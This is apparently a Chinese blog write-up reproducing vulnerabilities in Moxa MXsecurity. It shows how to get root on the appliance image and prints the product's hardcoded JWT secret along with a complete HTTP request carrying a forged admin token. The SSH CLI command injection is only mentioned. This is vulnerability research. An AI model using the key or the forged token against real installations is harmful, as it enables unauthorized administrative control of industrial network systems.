Moxa MXsecurity 硬编码认证绕过/SSH伪shell命令注入

警告
本文最后更新于 2023-05-26,文中内容可能已过时。

# 下载和安装

https://www.moxa.com/en/products/industrial-network-infrastructure/network-management-software/mxsecurity-series?viewmode=0#resources

https://moxa.com/getmedia/8e5b2588-de24-4bb1-ae58-16354ee70662/moxa-mxsecurity-series-manual-v1.0.pdf

# 登录ssh

用admin用户登录只有一个cli程序,不是bash,需要挂载vmdk修改/etc/shadow文件,改掉user1用户的密码。

1
user1:$6$xPyopDlu$p3jdHPn3XG8OToD6acaXPBtVQgIvx.fUor0rJEtL0qgLqfPDcPvKlC0eDa77P5afST3Hrg7DFlPQrdqAHSisY1:19188:0:99999:7:::

密码为qwe123!@#

然后用user1用户登录,sudo过去就是root了

image.png

# 源码

docker 启动的,从docker cp出来即可

1
2
3
4
5
6
7
[root@mxsecurity user1]# docker ps
CONTAINER ID   IMAGE                           COMMAND                  CREATED         STATUS                   PORTS                                                                                  NAMES
0173ff8b578c   nsm-web                         "python3 -u run.py"      8 minutes ago   Up 8 minutes             0.0.0.0:443->443/tcp, :::443->443/tcp                                                  nsm-web
eb9dcdd27d4b   nsm-receiver                    "python3 -u run.py"      8 minutes ago   Up 8 minutes                                                                                                    nsm-receiver
44dc99289cb6   eclipse-mosquitto:1.6-openssl   "/docker-entrypoint.…"   8 minutes ago   Up 8 minutes             0.0.0.0:1883->1883/tcp, :::1883->1883/tcp, 0.0.0.0:8883->8883/tcp, :::8883->8883/tcp   nsm-broker
d2175f582fac   cturra/ntp                      "/bin/sh /opt/startu…"   8 minutes ago   Up 8 minutes (healthy)   0.0.0.0:123->123/udp, :::123->123/udp                                                  nsm-ntp
[root@mxsecurity user1]# docker cp 0173ff8b578c:/app/ /tmp/

# jwt硬编码key

1
2
3
4
APP.config["JWT_SECRET_KEY"] = "MXsecurity secret key"
APP.config["JWT_ACCESS_TOKEN_EXPIRES"] = timedelta(days=1)
APP.config["JWT_TOKEN_LOCATION"] = ["headers", "cookies"]
JWT = JWTManager(APP)

伪造一个

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
GET /api/v1/system/status HTTP/1.1
Host: 172.16.16.204
Sec-Ch-Ua: "Google Chrome";v="113", "Chromium";v="113", "Not-A.Brand";v="24"
Dnt: 1
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTY4NTA2NTY0OCwianRpIjoiNjM0OTZmMzQtMjIzYi00MWE0LTg3MzMtNWEyMDZlMWM1NTQxIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6eyJ1c2VySWQiOiIxOTc4MjdkNC1mZjk5LTRlOTktOWVmOC03MTkzYTdhYWIzYTIiLCJ1c2VybmFtZSI6ImEiLCJkZXNjcmlwdGlvbiI6InJvb3QiLCJpc1Jvb3QiOnRydWUsInJvbGUiOnsicm9sZUlkIjoxLCJuYW1lIjoiQWRtaW4iLCJkZXNjcmlwdGlvbiI6IkFkbWluIiwicGVybWlzc2lvbkxpc3QiOlt7InBlcm1pc3Npb25JZCI6MSwiaWQiOiJkYXNoYm9hcmQiLCJ2YWx1ZSI6Mn0seyJwZXJtaXNzaW9uSWQiOjIsImlkIjoic3lzdGVtIiwidmFsdWUiOjJ9LHsicGVybWlzc2lvbklkIjozLCJpZCI6Im1hbmFnZW1lbnQiLCJ2YWx1ZSI6Mn0seyJwZXJtaXNzaW9uSWQiOjQsImlkIjoiZGV2aWNlQ29uZmlndXJhdGlvbiIsInZhbHVlIjoyfSx7InBlcm1pc3Npb25JZCI6NSwiaWQiOiJsb2dnaW5nIiwidmFsdWUiOjJ9LHsicGVybWlzc2lvbklkIjo2LCJpZCI6ImFib3V0IiwidmFsdWUiOjJ9XX0sInJlc2V0TW9kZSI6ImRvbmUiLCJsb2dpbmVkQXQiOiIyMDIzLTA1LTI2VDAxOjQ3OjI4WiIsImxvZ2luZWRUaW1lIjoxNjg1MDY1NjQ4LCJhdXRvTG9nb3V0VGltZSI6OTAwfSwibmJmIjoxNjg1MDY1NjQ4LCJjc3JmIjoiYWI3YjliMjctNjM4Ny00MDYzLWIxZmItZDc0OGRiNDcxZWE2IiwiZXhwIjoyNjk1MTUyMDQ4fQ.sO6cu-ly2D6e7ZctlVuBcF4CkNmZvbMuwQU7U-xyM2g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
Skiploading: true
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://172.16.16.204/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ga;q=0.6
Connection: close

image.png

# SSH伪shell命令注入

我刚开始还以为是web上的命令注入,然后仔细看了看通告,发现是/bin/cli程序的命令注入

image.png

我的评价是十分鸡肋。

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。